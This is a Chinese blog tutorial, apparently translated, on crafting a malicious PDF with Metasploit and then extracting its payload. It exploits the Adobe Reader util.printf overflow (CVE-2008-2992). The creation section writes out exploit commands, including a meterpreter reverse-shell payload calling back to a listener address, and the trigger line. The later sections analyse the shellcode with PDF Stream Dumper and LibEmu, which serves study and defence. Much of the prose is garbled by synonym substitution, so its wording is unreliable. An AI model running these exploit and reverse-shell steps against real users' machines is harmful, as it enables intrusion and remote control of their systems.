快捷搜索:  网络  CVE  渗透  后门  扫描  木马  黑客  as

恶意PDF文档阐发和payload提取要领

Acrobat Reader是一个可涉猎、搜索、打印几乎任何类型的PDF文件并与之交互的PDF查看程序。不夸张的说,几乎每一个电脑用户都装置并使用过它。由于它的用户范围广泛且安全问题频出,黑客技术,因此它一样成为了最容易被黑客行使的程序之一。通过度娘搜索“Acrobat Reader漏洞”那鸣一个壮观,动不动就是高危,看得我都手痒痒了~~

在本文中,我将向人人铺示创建恶意PDF文档,触发并行使漏洞的完备过程。此外,我还将带人人深入阐发恶意PDF文档,了解payload的存储方式和提取要领。

本文仅适用于研究教育目的!切勿非法损坏!

PDF格式

PDF(便携式文件格式,Portable Document Format)是由Adobe在1993年用于文件交换所发铺出的文件格式。

PDF首要由三项手艺组成:衍生自PostScript;字型嵌入体系;资料压缩及传输体系。它的优点在於跨平台、能保留文件原有格式(Layout)、开放标准,能免版税(Royalty-free)自由开发PDF相容软体,是一个开放标准。下列是一个典型PDF文档的结构图。有关更多信息,请参阅Adobe规范。

恶意PDF文档阐发和payload提取要领

恶意PDF创建

我们将使用metasploit来创建一个恶意伪造的PDF文档,其中将包含exploit和我们自定义的payload。因为该漏洞行使是针对特定版本的,因此我们需要在目标机器上下载装置一个较早版本的Reader。

起首,我们来创建PDF。该PDF行使成功后会在目标机器上弹出计算器(calc.exe)。关上metasploit console并键入下列命令:

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

以下所示:

恶意PDF文档阐发和payload提取要领

将刚创建的文件(/home/osboxes/.msf4/local/malicious.pdf)复制到同享驱动器上。

执行受感染PDF

在目标计算机上,下载并装置易受攻击的Adobe Reader版本(metasploit已经告诉我们版本应小于8.1.2)。我选择装置的是8.1.1版。

装置后,我们执行malicious.pdf文件。你应该会看到从Adobe Reader进程生成的计算器。漏洞成功被行使。

恶意PDF文档阐发和payload提取要领

我预备了另一个恶意PDF,使用了不同的payload,以下:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455

效果以下,我们成功在Adobe Reader上确立了一个后门(反向shell)。

恶意PDF文档阐发和payload提取要领

阐发受感染PDF

现在,让我们来看看恶意PDF中的内容,并尝试提取其中的payload(我们仍旧以calc.exe PDF为例)。

起首,我们需要用到一个名为PDF Stream Dumper的工具,下载并装置它。然后使用该工具加载我们的恶意PDF文档(请花些时间熟识该工具的基本使用)。

恶意PDF文档阐发和payload提取要领

我们先来使用菜单栏中的 “Exploit Scan” 选项来检测是否存在某些可行使漏洞:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

实际上,在stream 6中隐躲了一个可行使漏洞。

然则要是我们从头最先:在PDF中搜索漏洞时,我们大多数时辰会遇到由Javascript代码创建的堆喷射( heap spray)。该堆喷射用于将payload推送至堆上,一旦漏洞被触发就可以执行。

要是你关上Stream 1,你可以看到:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

接着,我们关上stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

执行位于stream 6的Javascript。该流显示了纯Javascript,现在是时辰关上“Javascript_UI”菜单了。可以看到这是一大串十六进制编码的字符,我们将其push到一个变量,以执行heap spray操作。下列是我们的payload:

恶意PDF文档阐发和payload提取要领

我们选择payload(引号之间的部分),然后关上“Shellcode_analysis”菜单。选择“scDbg – LibEmu Emulation”。此时,会弹出一个新的窗口并将shellcode解码为字节(你甚至可以将其保存到文件中):

恶意PDF文档阐发和payload提取要领

LibEmu是一个能够摹拟处理器的库,它会告知你汇编代码的执行信息,单击“Launch”按钮,一看你就明白了:

恶意PDF文档阐发和payload提取要领

在这里,我们可以清楚地看到shellcode会关上一个calc.exe窗口并退出。让我们另外一个恶意PDF(反向shell)也执行相同的阐发:

恶意PDF文档阐发和payload提取要领

可以看到,Shellcode正在加载操作套接字所需的库(ws2_32.dll),并尝试归连C&C。

这里我并没有放开谈论exploit本身,它位于javascript代码的末尾。它正在行使printf函数上的缓冲区溢出来执行任意代码。下列是我们的heap-sprayed shellcode:

util.printf("%45000.45000f", 0);

参考链接:

– http://www.sans.org/reading-room/whitepapers/malicious/owned-malicious-pdf-analysis-33443
– http://www.oldapps.com/adobe_reader.php
– http://contagiodump.blogspot.fr/2010/08/malicious-documents-archive-for.html
– http://contagiodump.blogspot.fr/2013/03/16800-clean-and-11960-malicious-files.html
– http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf
– http://blog.9bplus.com/analyzing-cve-2011-2462/
– https://www.fireeye.com/blog/threat-research/2012/07/analysis-of-a-different-pdf-malware.html
– http://resources.infosecinstitute.com/analyzing-malicious-pdf/

 *参考来源:adlice, secist 编译,

您可能还会对下面的文章感兴趣: